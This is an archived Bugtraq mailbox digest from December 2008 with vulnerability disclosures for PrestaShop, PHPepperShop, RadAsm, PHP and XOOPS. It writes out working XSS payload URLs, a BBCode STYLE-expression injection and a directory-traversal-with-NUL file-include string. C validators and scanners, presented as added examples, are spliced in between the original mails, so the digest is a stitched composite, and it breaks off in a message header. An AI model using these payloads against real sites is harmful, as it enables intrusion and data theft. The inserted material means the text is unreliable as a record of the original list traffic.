List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 17482 invoked from network); 8 Dec 2008 03:29:17 -0000
Date: Sun, 7 Dec 2008 20:32:37 -0700
Message-Id: <200812080332.mB83Wa3g001589@www3.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: th3.r00k.ieatpork@gmail.pork.com
To: bugtraq@securityfocus.com
Subject: Two XSS Flaws in PrestaShop 1.1.0.3
Status:   

Affects PrestaShop 1.1.0.3
product: homepage: http://prestashop.com

This is XSS in the URI of PrestaShop.  Trust no one,  not even your $_SERVER[PHP_SELF] .

http://10.1.1.155/prestashop_1.1.0.3/admin/login.php/%22%3Cscript%3Ealert(1)%3C/script%3E

Add an item to the shopping cart and then visit this URL:
http://10.1.1.155/Audit/Commerce/prestashop_1.1.0.3/order.php/%22%3Cscript%3Ealert(1)%3C/script%3E

Peace

From - Mon Dec  8 11:09:20 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f02
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38848-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 80A21ECC98
for <lists@securityspace.com>; Mon,  8 Dec 2008 11:08:09 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id E0B90237036; Mon,  8 Dec 2008 08:33:40 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 17652 invoked from network); 8 Dec 2008 03:37:42 -0000
Date: 8 Dec 2008 03:48:39 -0000
Message-ID: <20081208034839.11798.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: th3.r00k.ieatpork@gmail.pork.com
To: bugtraq@securityfocus.com
Subject: XSS in PHPepperShop v 1.4
Status:   

Vulnerable Version:PHPepperShop v 1.4
Homepage:http://www.phpeppershop.com

These are 4 reflective XSS flaws in the URI. Trust no one, not even your $_SERVER[PHP_SELF].

http://10.1.1.10/shop/kontakt.php/'<script>alert(1)</script>

http://10.1.1.10/index.php/%22%3Cscript%3Ealert(1)%3C/script%3E

http://10.1.1.155/Audit/Commerce/HackMe/shop/Admin/shop_kunden_mgmt.php/%22%3Cscript%3Ealert(1)%3C/script%3E

http://10.1.1.155/Audit/Commerce/HackMe/shop/Admin/SHOP_KONFIGURATION.php/"<script>alert(1)</script>

From - Mon Dec  8 11:19:20 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f03
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38849-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 3448AECDC0
for <lists@securityspace.com>; Mon,  8 Dec 2008 11:14:45 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 7FA3523703B; Mon,  8 Dec 2008 08:35:50 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 19970 invoked from network); 8 Dec 2008 05:43:48 -0000
Date: 8 Dec 2008 05:54:45 -0000
Message-ID: <20081208055445.20160.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: xhakerman2006@yahoo.com
To: bugtraq@securityfocus.com
Subject: RadAsm <=2.2.1.5 Local Command Execution
Status:   

------------------------------------------------------------------
vulnerability discovered by DATA_SNIPER.
bug discovered on 25/11/2008.
infected version: All Versions
greetz go to: www.at4re.com (Arab Team 4 Reverse Engineering), arab4services.net
Critical: Highly critical
Impact: Command Execution
------------------------------------------------------------------
This is a little POC that can execute arbitrary commands on the victim machine.
In an unexpected way, the attacker can put a command in the project file (".rap" file) instead of the linker path or the Macro Assembler "ML.exe" path.
The project file looks like this.
"some data has been cut to make it readable"
-------------------------------------
project file structure
[Project]
Assembler=masm
Type=Win32 App
......datat
[Files]
1=file.Asm
.....data
[MakeFiles]
5=CRC Check.exe
[MakeDef]
Menu=1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0
1=4,O,$B\RC.EXE /v,1 <==Command Execution by replacing the original file path with the command
2=3,O,$B\ML.EXE /c /coff /Cp /nologo /I"$I",2  <==Command Execution by replacing the original file path with the command
3=5,O,$B\LINK.EXE /SUBSYSTEM:WINDOWS /RELEASE /VERSION:4.0 /LIBPATH:"$L" /OUT:"$5",3,4 <==Command Execution by replacing the original file path with the command
4=0,0,,5
5=rsrc.obj,O,$B\CVTRES.EXE,rsrc.res <==Command Execution by replacing the original file path with the command
7=0,0,"$E\OllyDbg",5
6=*.obj,O,$B\ML.EXE /c /coff /Cp /nologo /I"$I",*.asm
11=4,O,$B\RC.EXE /v,1   <==Command Execution by replacing the original file path with the command
12=3,O,$B\ML.EXE /c /coff /Cp /Zi /nologo /I"$I",2   <==Command Execution by replacing the original file path with the command
13=5,O,$B\LINK.EXE /SUBSYSTEM:WINDOWS /DEBUG /VERSION:4.0 /LIBPATH:"$L" /OUT:"$5",3,4 <==Command Execution by replacing the original file path with the command
data.....
[Resource]
data.....and more data.
----------------------------------------------------------------------
As you see, "<==Command Execution by replacing the original file name with the command" means that this type of data in the project is exploited as command execution by malicious people.
And when the user tries to compile the project, he will face the issue of a bad command being executed on his operating system.
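A heuristic checker for the [MakeDef] section described in the post, added here as an example; it is not RadASM's code and the post does not describe such a tool. It assumes the "n=output,flag,command,inputs" layout visible in the sample, that legitimate build tools are referenced through a RadASM path macro such as $B\ or $E\, and that the tool lines from the post plus two constructed entries (marked) form the sample file. It flags any entry whose command field names something outside a macro directory, escapes it with "..", or chains further commands in its arguments, which is the kind of review a user can run on a project file of unknown origin before opening it.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define MAX_LINE 512

/* Heuristic check of one [MakeDef] command field. Returns 1 when the
 * command is empty or names a tool under a RadASM path macro ($B\, $E\)
 * with no traversal in the path and no chaining in the arguments;
 * returns 0 when the entry should be flagged for review. */
int command_looks_safe(const char *cmd)
{
    char tool[MAX_LINE];
    size_t n = 0;

    while (*cmd == ' ' || *cmd == '\t') cmd++;
    if (*cmd == '\0') return 1;                      /* e.g. 4=0,0,,5 */
    if (*cmd == '"') cmd++;                          /* e.g. "$E\OllyDbg" */
    while (*cmd && *cmd != ' ' && *cmd != '\t' && *cmd != '"' && n < sizeof tool - 1)
        tool[n++] = *cmd++;
    tool[n] = '\0';

    if (n < 3 || tool[0] != '$' || !isalpha((unsigned char)tool[1]) || tool[2] != '\\')
        return 0;                                    /* tool not under a macro dir */
    if (strstr(tool, "..") != NULL) return 0;        /* $B\..\..\x.exe */
    if (strpbrk(cmd, "&|;^<>") != NULL) return 0;    /* chaining in the arguments */
    return 1;
}

/* Copy the third comma-separated field of "out,flag,command,inputs" into
 * `out`; commas inside double quotes do not split. Returns 0 if absent. */
static int command_field(const char *value, char *out, size_t outsz)
{
    int commas = 0, inq = 0;
    size_t n = 0;

    for (; *value && commas < 2; value++)
        if (*value == ',') commas++;
    if (commas < 2) return 0;
    for (; *value && n < outsz - 1; value++) {
        if (*value == '"') inq = !inq;
        else if (*value == ',' && !inq) break;
        out[n++] = *value;
    }
    out[n] = '\0';
    return 1;
}

/* Scan a .rap text; returns the number of flagged [MakeDef] entries and
 * writes their keys, space separated, into `report`. */
int scan_rap(const char *rap, char *report, size_t reportsz)
{
    int in_makedef = 0, flagged = 0;
    report[0] = '\0';

    while (*rap) {
        char line[MAX_LINE], cmd[MAX_LINE], *eq;
        size_t full = strcspn(rap, "\n");
        size_t len = full < sizeof line ? full : sizeof line - 1;
        memcpy(line, rap, len);
        line[len] = '\0';
        if (len && line[len - 1] == '\r') line[len - 1] = '\0';   /* CRLF files */
        rap += full;
        if (*rap == '\n') rap++;

        if (line[0] == '[') { in_makedef = strcmp(line, "[MakeDef]") == 0; continue; }
        if (!in_makedef || !isdigit((unsigned char)line[0])) continue;  /* Menu=... */
        if ((eq = strchr(line, '=')) == NULL) continue;
        *eq = '\0';
        if (!command_field(eq + 1, cmd, sizeof cmd) || command_looks_safe(cmd)) continue;

        flagged++;
        if (strlen(report) + strlen(line) + 2 < reportsz) {
            if (report[0]) strcat(report, " ");
            strcat(report, line);
        }
    }
    return flagged;
}

/* Constructed sample in the layout shown in the post: the tool lines from
 * the post plus two entries of the kind it warns about (marked). */
const char SAMPLE_RAP[] =
    "[Project]\nAssembler=masm\nType=Win32 App\n"
    "[Files]\n1=file.Asm\n"
    "[MakeDef]\n"
    "Menu=1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0\n"
    "1=4,O,$B\\RC.EXE /v,1\n"
    "2=3,O,$B\\ML.EXE /c /coff /Cp /nologo /I\"$I\",2\n"
    "3=5,O,$B\\LINK.EXE /SUBSYSTEM:WINDOWS /RELEASE /VERSION:4.0 /LIBPATH:\"$L\" /OUT:\"$5\",3,4\n"
    "4=0,0,,5\n"
    "5=rsrc.obj,O,$B\\CVTRES.EXE,rsrc.res\n"
    "7=0,0,\"$E\\OllyDbg\",5\n"
    "11=4,O,cmd /c echo constructed-sample,1\n"     /* constructed: tool replaced by a command */
    "12=3,O,$B\\..\\..\\not_a_tool.exe /c,2\n"      /* constructed: traversal out of $B */
    "[Resource]\n";

int main(void)
{
    char report[128];
    int n = scan_rap(SAMPLE_RAP, report, sizeof report);
    printf("%d flagged [MakeDef] entries: %s\n", n, report);
    return 0;
}
```

The check is lexical only: it cannot tell a renamed binary under $B\ from the real assembler, so a flagged entry is a reason to inspect the file, and a clean result is not a guarantee.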

From - Mon Dec  8 11:29:20 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f04
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38851-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id DCADDECDBC
for <lists@securityspace.com>; Mon,  8 Dec 2008 11:27:06 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id DF500237060; Mon,  8 Dec 2008 08:37:47 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 24049 invoked from network); 8 Dec 2008 10:32:05 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=simple; s=one; d=codelabs.ru;
h=Received:Date:From:To:Cc:Subject:Message-ID:References:MIME-Version:Content-Type:Content-Disposition:In-Reply-To:Sender;
b=VjRgsrYesThZ1rwoHlnsXXFoHrBT+/6H8BuaikoT0vi5pQCXHSJysFuImBbDxFcKlI1bOT6GcDP3taiifWRalPBo8WreC3SrANcVRUC0V1JRZEu3rXAF2UM6xNc4uTeXmqNbbB4PlK9clpickOkMp6fz0JvGbCI1w3XLrqe9ITk=;
Date: Mon, 8 Dec 2008 13:49:03 +0300
From: Eygene Ryabinkin <rea-sec@codelabs.ru>
To: cxib@securityreason.com
Cc: bugtraq@securityfocus.com
Subject: Re: SecurityReason: PHP 5.2.6 SAPI php_getuid() overload
Message-ID: <sqp89FAGtFIVr1Bhz/kFH6+7Yu4@DnrfhFPe1KmBT9SMnrHVxzpiU9A>
References: <200812061940.mB6JemE5002856@www5.securityfocus.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=koi8-r
Content-Disposition: inline
In-Reply-To: <200812061940.mB6JemE5002856@www5.securityfocus.com>
Sender: rea-sec@codelabs.ru
Status:   

Maksymilian, good day.

Sat, Dec 06, 2008 at 12:40:48PM -0700, cxib@securityreason.com wrote:
> [ SecurityReason.com : PHP 5.2.6 SAPI php_getuid() overload ]
[...]
> Using PHP 5.2.6, as a Apache module can bypass many security points.

Am I right that this vulnerability exists only in the Apache 1.x flavour
of the PHP module?  The code in question that sets SG(server_context)
too late and initializes BG variable after the .htaccess processing
exists only in sapi/apache/mod_php5.c.  For Apache 2.x module the
handler is 'php_handler', it lives in apache2{filter,handler}/sapi_apache2.c
and BG/SG(server_context) are initialized before .htaccess processing.

And to clarify a bit the overall picture: am I right that the purpose of
your sleep.php manipulations is to make Apache to invoke another "fresh"
child that will process error_log contents with erroneous value of
uid/gid = 0?  It seems to me that the effect of the found vulnerability
can be shortly characterized as "the first request for the given Apache
child will have uid/gid = 0 as the values returned from 'php_getuid()'
in the code that handles .htaccess contents (to be precise, in the code
inside the function send_php() before the call to
apache_php_module_main(), the point where BG is really initialized by
PHP_RINIT_FUNCTION(basic))".  Am I missing something?

Thank you!
-- 
Eygene

From - Mon Dec  8 11:39:20 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f05
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38852-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id BB8FAEC7D6
for <lists@securityspace.com>; Mon,  8 Dec 2008 11:36:16 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 84733237065; Mon,  8 Dec 2008 08:38:03 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 25378 invoked from network); 8 Dec 2008 12:02:27 -0000
Date: Mon, 8 Dec 2008 15:18:39 +0300
From: "Digital Security Research Group [DSecRG]" <research@dsec.ru>
X-Mailer: The Bat! (v3.80.06) Professional
Reply-To: "CTac C." <research@dsec.ru>
Organization: Digital Security
X-Priority: 3 (Normal)
Message-ID: <1396793223.20081208151839@dsec.ru>
To: bugtraq@securityfocus.com, vuln@secunia.com,
packet@packetstormsecurity.org
Subject: [DSECRG-08-040] Multiple Local File Include Vulnerabilities in Xoops 2.3.x
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Status:   


Digital Security Research Group [DSecRG] Advisory       #DSECRG-08-040


Application:                    XOOPS   
Versions Affected:              2.3.1
Vendor URL:                     http://www.xoops.org/
Bug:                            Multiple Local File Include
Exploits:                       YES
Reported:                       10.11.2008
Vendor response:                10.11.2008
Solution:                       YES
Date of Public Advisory:        08.12.2008
Authors:                        Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)



Description
***********

XOOPS has Multiple Local File Include vulnerabilities.



Details
*******

Local File Include vulnerability found in scripts:

xoops_lib/modules/protector/blocks.php
xoops_lib/modules/protector/main.php

Successful exploitation requires that "register_globals" is enabled.

Code
----
#################################################

$mytrustdirname = basename( dirname( __FILE__ ) ) ;
$mytrustdirpath = dirname( __FILE__ ) ;

// language files
$language = empty( $xoopsConfig['language'] ) ? 'english' : $xoopsConfig['language'] ;
if( file_exists( "$mydirpath/language/$language/main.php" ) ) {
        // user customized language file (already read by common.php)
        // include_once "$mydirpath/language/$language/main.php" ;
} else if( file_exists( "$mytrustdirpath/language/$language/main.php" ) ) {
        // default language file
        include_once "$mytrustdirpath/language/$language/main.php" ;
...

#################################################

For successful exploitation, the first condition in the if..else statement must not be true.

Example:

http://[server]/[installdir]/xoops_lib/modules/protector/blocks.php?mydirpath=DSecRG/DSecRG/DSecRG&xoopsConfig[language]=../../../../../../../boot.ini%00
http://[server]/[installdir]/xoops_lib/modules/protector/main.php?mydirpath=DSecRG/DSecRG/DSecRG&xoopsConfig[language]=../../../../../../../boot.ini%00



Solution
********

Vendor fixed this flaw on 26.11.2008. 

XOOPS 2.3.2a Security Release can be downloaded from the Sourceforge repository:

https://sourceforge.net/project/showfiles.php?group_idA586&package_id3583&release_idd3010

Release notes:

http://www.xoops.org/modules/news/article.php?storyidE40



About
*****

Digital Security is a leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.


Contact:    research [at] dsec [dot] ru
            http://www.dsec.ru (in Russian)
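A validator for the language value used in the include path above, added here as an example in C; it is neither XOOPS's code nor DSecRG's. It assumes a fixed, non-request-controlled base directory (the advisory's $mydirpath is request-controlled once register_globals is on), an allowlist of lowercase names with an inner underscore, and that the request's byte length is available so that the trailing %00 from the example URLs is seen as an embedded NUL instead of silently truncating the path. Both of the advisory's conditions, the traversal and the NUL byte, are handled.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Result codes returned by validate_language(). */
enum lang_result { LANG_OK = 0, LANG_EMPTY, LANG_TOO_LONG, LANG_EMBEDDED_NUL, LANG_BAD_CHAR };

#define LANG_MAX 64

/* Validate a language name before it is used to build an include path.
 * `len` is the byte length the request carried: an embedded NUL (%00) is
 * then visible although C string functions, like the affected PHP
 * versions' path handling, would stop at it. Only lowercase letters and
 * an inner underscore are accepted, so '.', '/' and '\\' never reach the
 * path. */
enum lang_result validate_language(const char *value, size_t len)
{
    if (len == 0) return LANG_EMPTY;
    if (len > LANG_MAX) return LANG_TOO_LONG;
    if (strlen(value) != len) return LANG_EMBEDDED_NUL;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)value[i];
        if (!(islower(c) || (c == '_' && i > 0 && i + 1 < len))) return LANG_BAD_CHAR;
    }
    return LANG_OK;
}

/* Build "<trustdir>/language/<lang>/main.php". `trustdir` is a compile-time
 * or configuration constant, never a request variable. Returns 1 and fills
 * `out` only for a validated name; otherwise `out` is left empty. */
int build_language_path(const char *trustdir, const char *lang, size_t lang_len,
                        char *out, size_t outsz)
{
    out[0] = '\0';
    if (validate_language(lang, lang_len) != LANG_OK) return 0;
    int n = snprintf(out, outsz, "%s/language/%s/main.php", trustdir, lang);
    return n > 0 && (size_t)n < outsz;
}

/* Constructed request values, including the traversal pattern from the
 * advisory with and without its trailing %00 byte. */
static const char TRAVERSAL[] = "../../../../../../../boot.ini";

int demo_count_rejected(void)
{
    const struct { const char *name; const char *value; size_t len; } samples[] = {
        { "normal",        "english", 7 },
        { "regional",      "pt_br",   5 },
        { "traversal+nul", TRAVERSAL, sizeof TRAVERSAL },      /* sizeof counts the NUL */
        { "traversal",     TRAVERSAL, sizeof TRAVERSAL - 1 },
        { "empty",         "",        0 },
    };
    int rejected = 0;
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        enum lang_result r = validate_language(samples[i].value, samples[i].len);
        printf("%-14s -> %s\n", samples[i].name, r == LANG_OK ? "ok" : "rejected");
        if (r != LANG_OK) rejected++;
    }
    return rejected;
}

int main(void)
{
    char path[256];
    /* "/srv/xoops" is a placeholder install directory, not from the advisory. */
    if (build_language_path("/srv/xoops/xoops_lib/modules/protector", "english", 7,
                            path, sizeof path))
        printf("include %s\n", path);
    printf("%d of 5 sample values rejected\n", demo_count_rejected());
    return 0;
}
```

Allowlisting the name is what removes the traversal; the explicit length check is what removes the NUL truncation, and it matters even on runtimes that reject NUL in paths, because it turns a silent failure into a logged rejection.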



From - Mon Dec  8 11:49:20 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f06
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38853-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 3CD42EC803
for <lists@securityspace.com>; Mon,  8 Dec 2008 11:49:02 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 9740D237077; Mon,  8 Dec 2008 08:38:18 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 25474 invoked from network); 8 Dec 2008 12:05:31 -0000
Date: Mon, 8 Dec 2008 15:21:47 +0300
From: "Digital Security Research Group [DSecRG]" <research@dsec.ru>
X-Mailer: The Bat! (v3.80.06) Professional
Reply-To: "CTac C." <research@dsec.ru>
Organization: Digital Security
X-Priority: 3 (Normal)
Message-ID: <788445757.20081208152147@dsec.ru>
To: bugtraq@securityfocus.com, vuln@secunia.com,
packet@packetstormsecurity.org
Subject: [DSECRG-08-041] Stored XSS Vulnerability in Xoops 2.3.x
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Status:   


Digital Security Research Group [DSecRG] Advisory       #DSECRG-08-041


Application:                    XOOPS   
Versions Affected:              2.3.1, 2.3.2a
Vendor URL:                     http://www.xoops.org/
Bug:                            Stored XSS
Exploits:                       YES
Reported:                       10.11.2008
Vendor response:                10.11.2008
Solution:                       YES
Date of Public Advisory:        08.12.2008
Authors:                        Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)



Description
***********

XOOPS has Stored XSS vulnerability.



Details
*******

Vulnerability found in script pmlite.php

User can inject script into private message using BBCode post parameter [url].

Example:

[url=" STYLE="test:expression(alert('DSecRG XSS'))]DSecRG XSS[/url]



Solution
********

Vendor fixed this flaw on 07.12.2008. 

XOOPS 2.3.2b Security Release can be downloaded from the Sourceforge repository:

https://sourceforge.net/project/showfiles.php?group_idA586&package_id3583&release_idd3845

Release notes:

http://www.xoops.org/modules/news/article.php?storyidE63



About
*****

Digital Security is a leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.


Contact:    research [at] dsec [dot] ru
            http://www.dsec.ru (in Russian)
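One C example, added here, that covers both XSS shapes reported in this digest: the reflected PHP_SELF/PATH_INFO case from the PrestaShop and PHPepperShop posts and the stored [url=...] case in this advisory. It is not the code of any of those projects. It assumes the output is a double-quoted HTML attribute, that a BBCode URL must be an absolute http(s) URL made of URL characters only, and uses the payload shapes from the posts as constructed inputs. The two defences shown are output encoding at the point of rendering and strict validation of the attribute value before it is stored.

```c
#include <stdio.h>
#include <string.h>

/* Escape a string for use inside a double-quoted HTML attribute or text
 * node. Returns the output length, or -1 if `out` is too small. */
int html_escape(const char *in, char *out, size_t outsz)
{
    size_t n = 0;
    for (; *in; in++) {
        char one[2] = { *in, 0 };
        const char *rep;
        switch (*in) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   rep = one;      break;
        }
        size_t rl = strlen(rep);
        if (n + rl >= outsz) return -1;
        memcpy(out + n, rep, rl);
        n += rl;
    }
    out[n] = '\0';
    return (int)n;
}

/* Reflected case: PHP_SELF includes PATH_INFO, so everything after
 * "login.php/" lands in the form action. Escaping at the output point keeps
 * it inside the attribute. Returns the rendered length or -1. */
int render_form_action(const char *php_self, char *out, size_t outsz)
{
    char esc[1024];
    if (html_escape(php_self, esc, sizeof esc) < 0) return -1;
    int n = snprintf(out, outsz, "<form action=\"%s\" method=\"post\">", esc);
    return (n > 0 && (size_t)n < outsz) ? n : -1;
}

/* Stored case: a [url=...] value is accepted only as an absolute http(s)
 * URL built from URL characters. Quotes, spaces and control characters,
 * which the STYLE=... payload needs to break out of the attribute, are
 * rejected before anything is stored. Returns 1 and writes the anchor on
 * success, 0 otherwise. */
int bbcode_url_to_html(const char *url, const char *text, char *out, size_t outsz)
{
    static const char allowed[] =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
        "-._~:/?#[]@!$&'()*+,;=%";
    out[0] = '\0';
    if (strncmp(url, "http://", 7) != 0 && strncmp(url, "https://", 8) != 0) return 0;
    if (strlen(url) > 2048 || strspn(url, allowed) != strlen(url)) return 0;

    char u[2100], t[1024];
    if (html_escape(url, u, sizeof u) < 0 || html_escape(text, t, sizeof t) < 0) return 0;
    int n = snprintf(out, outsz, "<a href=\"%s\">%s</a>", u, t);
    return n > 0 && (size_t)n < outsz;
}

/* Constructed input in the shape of the PATH_INFO payloads from the posts.
 * Returns 1 when the rendered output contains exactly one raw '<' (the
 * form tag itself), i.e. the payload stayed inside the attribute. */
int demo_reflected_is_contained(void)
{
    char out[512];
    const char *php_self = "/admin/login.php/\"<script>alert(1)</script>";
    if (render_form_action(php_self, out, sizeof out) < 0) return 0;
    puts(out);
    int raw_lt = 0;
    for (const char *p = out; *p; p++) if (*p == '<') raw_lt++;
    return raw_lt == 1;
}

/* Constructed input in the shape of the [url] payload from the advisory;
 * returns 1 when it is rejected and a plain https URL is accepted. */
int demo_stored_url_rejected(void)
{
    char out[512];
    int bad  = bbcode_url_to_html("\" STYLE=\"test:expression(alert('DSecRG XSS'))",
                                  "DSecRG XSS", out, sizeof out);
    int good = bbcode_url_to_html("https://www.xoops.org/", "XOOPS", out, sizeof out);
    return bad == 0 && good == 1;
}

int main(void)
{
    printf("reflected contained: %d\n", demo_reflected_is_contained());
    printf("stored url rejected: %d\n", demo_stored_url_rejected());
    return 0;
}
```

The reflected fix does not need a validator because the path is only displayed; the stored fix validates as well as escapes because the value is reused later as a live URL, where escaping alone would still allow a javascript: scheme.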



From - Mon Dec  8 11:59:20 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f07
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38854-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id D97E5ECBB1
for <lists@securityspace.com>; Mon,  8 Dec 2008 11:58:34 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id A6D64237079; Mon,  8 Dec 2008 08:38:46 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 26472 invoked from network); 8 Dec 2008 12:57:46 -0000
Message-ID: <493D1DBC.4060400@securityreason.com>
Date: Mon, 08 Dec 2008 14:14:36 +0100
From: Maksymilian Arciemowicz <cxib@securityreason.com>
User-Agent: Thunderbird 2.0.0.18 (Windows/20081105)
MIME-Version: 1.0
